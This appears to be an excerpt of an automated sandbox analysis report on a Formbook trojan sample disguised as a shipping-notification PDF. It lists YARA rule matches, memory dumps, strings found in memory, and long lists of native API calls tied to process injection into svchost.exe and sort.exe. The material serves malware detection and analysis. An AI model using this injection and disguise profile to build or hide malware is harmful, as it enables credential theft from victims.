            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: shipping notification_pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0042C0E3 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036735C0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672B60 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672DF0 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672C70 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03674340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03673010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03673090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03674650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03673D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03673D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03934340 NtSetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03934650 NtSuspendThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039335C0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932BA0 NtEnumerateValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932BF0 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932BE0 NtQueryValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932B60 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932AD0 NtReadFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932AF0 NtWriteFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039339B0 NtGetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932FB0 NtResumeThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932FE0 NtCreateFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932F30 NtCreateSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932E80 NtReadVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932EE0 NtQueueApcThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932DD0 NtDelayExecution, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932DF0 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932D10 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932D30 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932CA0 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932C70 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932C60 NtCreateKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03933090 NtSetValueKey
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03933010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03933D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03933D70 NtOpenThread
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03932C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F98AF0 NtCreateFile
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F98E00 NtClose
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F98F70 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F98C60 NtReadFile
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F98D50 NtDeleteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004180D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00403060
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040F943
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040F93D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004162C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004162BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040FB63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040DBDC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040DBE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00402500
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0042E753
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040277C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00402780
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036FFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036E0CB5
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0394739A
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0390E3F0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039C03E6
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B132D
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038ED34C
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BA352
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039052A0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0391B2C0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039A12ED
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039A0274
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0390B1B0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039C01AA
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B81CC
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0399A118
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038F0100
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039CB16B
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038EF172
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0393516C
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039070C0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039AF0CC
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B70E9
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BF0E0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BF7B0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038FC7C0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03924750
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03900770
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B16CC
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0391C6E0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039C0591
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0399D5B0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03900535
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B7571
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039AE4F6
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BF43F
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B2446
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038F1460
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0391FB80
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B6BD7
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0393DBF9
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BAB40
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BFB76
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038FEA80
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03945AA0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0399DAAC
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039ADAC6
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BFA49
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039B7A46
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03973A6C
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039029A0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039CA9A6
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03909950
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0391B950
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03916962
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038E68B8
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0392E8F0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039038E0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0396D800
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03902840
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0390A840
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03901F92
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BFFB1
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038F2FC8
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_0390CFE0
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_039BFF09
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03920F30
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03942F28
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03974F40
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_03912E90
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BCE9311_2_039BCE93
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03909EB011_2_03909EB0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BEEDB11_2_039BEEDB
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BEE2611_2_039BEE26
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03900E5911_2_03900E59
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03918DBF11_2_03918DBF
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0391FDC011_2_0391FDC0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038FADE011_2_038FADE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_0390AD0011_2_0390AD00
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B1D5A11_2_039B1D5A
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03903D4011_2_03903D40
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039B7D7311_2_039B7D73
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039A0CB511_2_039A0CB5
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039BFCF211_2_039BFCF2
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_038F0CF211_2_038F0CF2
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03900C0011_2_03900C00
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03979C3211_2_03979C32
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F8174011_2_02F81740
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7C66011_2_02F7C660
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7C65A11_2_02F7C65A
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F9B47011_2_02F9B470
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7A8F911_2_02F7A8F9
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7C88011_2_02F7C880
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F7A90011_2_02F7A900
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F82FE011_2_02F82FE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F82FDB11_2_02F82FDB
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F84DF011_2_02F84DF0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE3D411_2_037BE3D4
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE2B611_2_037BE2B6
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE76C11_2_037BE76C
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BD7D811_2_037BD7D8
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BCA8811_2_037BCA88
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_037BE8F211_2_037BE8F2
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_05333D4A12_2_05333D4A
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_05333D4F12_2_05333D4F
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532D5EF12_2_0532D5EF
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_053324AF12_2_053324AF
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532B66812_2_0532B668
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532B66F12_2_0532B66F
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0534C1DF12_2_0534C1DF
